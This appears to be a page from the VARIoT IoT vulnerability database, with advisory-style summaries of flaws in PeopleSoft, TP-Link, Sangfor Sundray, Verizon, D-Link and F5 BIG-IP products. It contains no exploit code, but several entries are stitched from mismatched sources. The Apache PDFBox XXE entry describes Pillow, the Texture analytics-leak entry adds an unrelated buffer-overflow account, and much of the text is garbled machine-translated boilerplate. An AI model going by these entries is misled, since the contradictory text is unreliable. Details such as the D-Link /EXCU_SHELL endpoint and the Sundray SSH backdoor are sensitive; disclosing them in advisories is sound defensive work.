VARIoT IoT vulnerabilities database

Vulnerability in the PeopleSoft Enterprise HRMS component of Oracle PeopleSoft Products (subcomponent: Candidate Gateway). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise HRMS. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise HRMS, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise HRMS accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise HRMS accessible data. CVSS 3.0 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). The vulnerability can be exploited over the 'HTTPS' protocol

The ping feature in the Diagnostic functionality on TP-LINK WR840N v2 Firmware 3.16.9 Build 150701 Rel.51516n devices allows remote attackers to cause a denial of service (HTTP service termination) by modifying the packet size to be higher than the UI limit of 1472. TP-LINK WR840N A firmware device contains a vulnerability related to input validation.Service operation interruption (DoS) There is a possibility of being put into a state. TP-Link WR840N is a wireless router of China Pulian (TP-Link). There is a security vulnerability in the diagnostic function of TP-LINK WR840N v2 using 3.16.9 Build 150701 Rel.51516n firmware

IBM MQ 8.0.0.0 through 8.0.0.10, 9.0.0.0 through 9.0.0.5, and 9.1.0.0 through 9.1.1 is vulnerable to a denial of service attack within the TLS key renegotiation function. IBM X-Force ID: 156564. IBM MQ Contains an input validation vulnerability. Vendors report this vulnerability IBM X-Force ID: 156564 Published as.Denial of service (DoS) May be in a state. An attacker can exploit this issue to cause a denial-of-service condition. The following product and versions are affected: IBM MQ and MQ Appliance from versions 8.0.0.0 through 8.0.0.10, 9.0.0.0 through 9.0.0.5, 9.1.0.0 through 9.1.0.1 and 9.1.0 through 9.1.1

ABB, Phoenix Contact, Schneider Electric, Siemens, WAGO - Programmable Logic Controllers, multiple versions. Researchers have found some controllers are susceptible to a denial-of-service attack due to a flood of network packets. Programmable Logic Controller Contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. ABB/Phoenix Contact/Schneider Electric/Siemens/WAGO PLCs are prone to an remote denial-of-service vulnerability. An attacker can exploit this issue to cause a denial of service condition. There are resource management error vulnerabilities in many PLC products, which originate from improper management of system resources (such as memory, disk space, files, etc.) by the network system or products

Delta Industrial Automation CNCSoft, CNCSoft ScreenEditor Version 1.00.88 and prior. Multiple out-of-bounds read vulnerabilities may be exploited, allowing information disclosure due to a lack of user input validation for processing specially crafted project files. Delta CNCSoft ScreenEditor Contains an out-of-bounds vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Delta Industrial Automation CNCSoft ScreenEditor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of DPB files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the Administrator. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities 3

A local attacker can create a hard-link between a file to which the Check Point Endpoint Security client for Windows before E80.96 writes and another BAT file, then by impersonating the WPAD server, the attacker can write BAT commands into that file that will later be run by the user or the system. Check Point Endpoint Security client Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Checkpoint Endpoint Security Client for Windows is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Versions prior to Checkpoint Endpoint Security Client E80.96 for Windows are vulnerable. Check Point Endpoint Security is a set of terminal security protection software from Israel Check Point Company

Apache PDFBox 2.0.14 does not properly initialize the XML parser, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XFDF. Apache PDFBox Is XML An external entity vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Attackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition. This may lead to further attacks. Apache PDFBox 2.0.14 is vulnerable

Himalayan Xiaoya smart speaker is a smart speaker product produced by Himalayan company. The Himalayan Xiaoya smart speaker has an unauthorized access vulnerability. An attacker can control the speaker to play any remote and local arbitrary audio file by constructing a malicious dlna protocol packet.

WAC on the Sangfor Sundray WLAN Controller version 3.7.4.2 and earlier has a Remote Code Execution issue allowing remote attackers to achieve full access to the system, because shell metacharacters in the nginx_webconsole.php Cookie header can be used to read an etc/config/wac/wns_cfg_admin_detail.xml file containing the admin password. (The password for root is the WebUI admin password concatenated with a static string.). Sangfor Sundray WLAN Controller Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Shenzhen Xinrui Network Technology Co., Ltd. is a wholly-owned subsidiary of Shenzhen Confidence Group, a next-generation enterprise-class wireless, IoT and switch solution provider. There is a command execution vulnerability in the letter-sharp WAC, and an attacker can exploit the vulnerability to execute arbitrary commands. Sundray WLAN Controller (Sundray WAC) is a set of wireless LAN controller software from China Sundray Network Technology (Sundray) company. There are security holes in WAC from Sundray WAC 3.0 to WAC3.7.4.2

WAC on the Sangfor Sundray WLAN Controller version 3.7.4.2 and earlier has a backdoor account allowing a remote attacker to login to the system via SSH (on TCP port 22345) and escalate to root (because the password for root is the WebUI admin password concatenated with a static string). Sangfor Sundray WLAN Controller Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Shenzhen Xinrui Network Technology Co., Ltd. is a wholly-owned subsidiary of Shenxinfu Group. It is a next-generation enterprise-class wireless, Internet of Things and switch solution manufacturer. Xinrui WAC has a weak password vulnerability. An attacker could use this vulnerability to gain administrative rights on the system. Sundray WLAN Controller (Sundray WAC) is a set of wireless LAN controller software from China Sundray Network Technology (Sundray) company. The vulnerability stems from the incorrect use of relevant cryptographic algorithms in the network system or product, resulting in incorrect encryption of content, weak encryption, and sensitive information stored in plain text

Information disclosure vulnerability in Verizon Fios Quantum Gateway (G1100) firmware version 02.01.00.05 allows an remote, unauthenticated attacker to retrieve the value of the password salt by simply requesting an API URL in a web browser (e.g. /api). Verizon Fios Quantum Gateway (G1100) Firmware contains an information disclosure vulnerability.Information may be obtained. Verizon Wireless FiosQuantumGateway (G1100) is a wireless router from Verizon Wireless. An information disclosure vulnerability exists in VerizonFiosQuantumGateway (G1100) using firmware version 02.01.00.05, which is due to errors in the configuration of the network system or product during operation. An attacker could exploit this vulnerability to obtain sensitive information about an affected component

Remote command injection vulnerability in Verizon Fios Quantum Gateway (G1100) firmware version 02.01.00.05 allows a remote, authenticated attacker to execute arbitrary commands on the target device by adding an access control rule for a network object with a crafted hostname. Verizon Fios Quantum Gateway (G1100) The firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Verizon Wireless FiosQuantumGateway (G1100) is a wireless router from Verizon Wireless. A command injection vulnerability exists in VerizonFiosQuantumGateway (G1100) using firmware version 02.01.00.05. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command

On D-Link DAP-1530 (A1) before firmware version 1.06b01, DAP-1610 (A1) before firmware version 1.06b01, DWR-111 (A1) before firmware version 1.02v02, DWR-116 (A1) before firmware version 1.06b03, DWR-512 (B1) before firmware version 2.02b01, DWR-711 (A1) through firmware version 1.11, DWR-712 (B1) before firmware version 2.04b01, DWR-921 (A1) before firmware version 1.02b01, and DWR-921 (B1) before firmware version 2.03b01, there exists an EXCU_SHELL file in the web directory. By sending a GET request with specially crafted headers to the /EXCU_SHELL URI, an attacker could execute arbitrary shell commands in the root context on the affected device. Other devices might be affected as well. plural D-Link The product contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DAP-1530 and other products are products of Taiwan D-Link. D-Link DAP-1530 is a wireless signal expander. D-Link DAP-1610 is a wireless signal expander. D-Link DWR-111 is a wireless router. There are security holes in several D-Link products. D-Link DAP-1530, etc

Some analytics data was sent using HTTP rather than HTTPS. This was addressed by no longer sending this analytics data. This issue is fixed in Texture 5.11.10 for iOS, Texture 4.22.0.4 for Android. An attacker in a privileged network position may be able to intercept analytics data. Apple Texture is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Texture is a magazine management app. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. Texture Canada Android & iOS Applications - Unencrypted Third Party Analytics (CVE-2019-8632) -- https://www.info-sec.ca/advisories/Texture.html Overview "Texture: Unlimited access to over 100 of the world's best magazines on your computer, smartphone or tablet." (https://play.google.com/store/apps/details?id=com.nim.rogers) (https://itunes.apple.com/ca/app/texture-canada/id649174756) Issue The Texture Canada Android & iOS applications (Android version 4.21.0.1, iOS version 5.11.6 and below) sends potentially sensitive information such as number of app launches, device model, Android or iOS version and screen resolution, unencrypted to a third party site (ScorecardResearch). Impact An attacker who can monitor network traffic could capture potentially sensitive information about the user's device without their knowledge. Timeline July 10, 2018 - Attempted to notify Texture of the issue via security@texture.ca July 10, 2018 - Attempted to notify Texture of the issue via support@texture.ca July 12, 2018 - Provided the details of the issue to Apple via product-security@apple.com May 9, 2019 - Published an advisory to document the issue Solution Upgrade to Android version 4.22.0.4 or iOS version 5.11.10 (U.S. versions are also affected but have not been tested) https://support.apple.com/en-us/HT210110 https://support.apple.com/en-us/HT210111 https://support.apple.com/en-us/HT201222 CVE-ID: CVE-2019-8632

A vulnerability in SonicWall Global Management System (GMS), allow a remote user to gain access to the appliance using existing SSH key. This vulnerability affects GMS versions 9.1, 9.0, 8.7, 8.6, 8.4, 8.3 and earlier. SonicWall Global Management System (GMS) is a global management system of SonicWall Corporation in the United States. The system enables rapid deployment and centralized management of Dell SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. The following versions are affected: SonicWall Global Management System Version 9.1, Version 9.0, Version 8.7, Version 8.6, Version 8.4, Version 8.3

Memory access in virtual memory mapping for some microprocessors may allow an authenticated user to potentially enable information disclosure via local access. Intel Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * Privilege escalation (CVE-2018-18094, CVE-2019-0158, CVE-2019-0162, CVE-2019-0163) * Information leak (CVE-2019-0162) * Service operation interruption (DoS) attack (CVE-2019-0162). Intel Microprocessors is a microprocessor (CPU) product of Intel Corporation of the United States. A security vulnerability exists in Intel Microprocessors. An attacker could exploit this vulnerability to disclose information

On BIG-IP versions 14.0.0-14.0.0.4, 13.0.0-13.1.1.1, 12.1.0-12.1.4, 11.6.0-11.6.3.4, and 11.5.1-11.5.8, the system is vulnerable to a denial of service attack when performing URL classification. BIG-IP Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. F5 BIG-IP APM is a set of access and security solutions from F5 Corporation of the United States. The product provides unified access to business-critical applications and networks. An input validation error vulnerability exists in F5 BIG-IP APM. The vulnerability stems from the failure of the network system or product to properly validate the input data. The following versions are affected: F5 BIG-IP APM version 14.0.0 to version 14.0.0.4, version 13.0.0 to version 13.1.1.1, version 12.1.0 to version 12.1.4, version 11.6.0 to version 11.6.3.4, Version 11.5.1 to Version 11.5.8

On EX4300-MP Series devices with any lo0 filters applied, transit network traffic may reach the control plane via loopback interface (lo0). The device may fail to forward such traffic. This issue affects Juniper Networks Junos OS 18.2 versions prior to 18.2R1-S2, 18.2R2 on EX4300-MP Series. This issue does not affect any other EX series devices. JunosOS is a network operating system dedicated to the company's hardware devices. A security vulnerability exists in the JunosOS 18.2 version of the Juniper Networks EX4300-MP. An attacker can exploit this issue to cause a denial-of-service condition, effectively denying service to legitimate users. This vulnerability is due to the lack of security measures such as authentication, access control, and rights management in network systems or products

On D-Link DI-524 V2.06RU devices, multiple Stored and Reflected XSS vulnerabilities were found in the Web Configuration: /spap.htm, /smap.htm, and /cgi-bin/smap, as demonstrated by the cgi-bin/smap RC parameter. D-Link DI-524 The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDI-524 is a wireless router from D-Link Corporation of Taiwan, China. A cross-site scripting vulnerability exists in the D-LinkDI-5242.06RU release, which stems from the lack of proper validation of client data by web applications. An attacker could exploit the vulnerability to execute client code

Platform dependent weakness. This issue only impacts iSeries platforms. On these platforms, in BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) versions 14.0.0-14.1.0.1, 13.0.0-13.1.1.3, and 12.1.1 HF2-12.1.4, the secureKeyCapable attribute was not set which causes secure vault to not use the F5 hardware support to store the unit key. Instead the unit key is stored in plaintext on disk as would be the case for Z100 systems. Additionally this causes the unit key to be stored in UCS files taken on these platforms. plural BIG-IP The product contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Multiple BIG-IP Products are prone to an information-disclosure vulnerability. Successfully exploiting this issue may allow attackers to obtain sensitive information. This may lead to other attacks. F5 BIG-IP is an application delivery platform integrated with network traffic management, application security management, load balancing and other functions of the US company F5. A trust management issue vulnerability exists in the F5 BIG-IP. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components. The following versions are affected: F5 BIG-IP version 14.0.0 to 14.1.0.1, 13.0.0 to 13.1.1.3, 12.1.1 HF2 to 12.1.4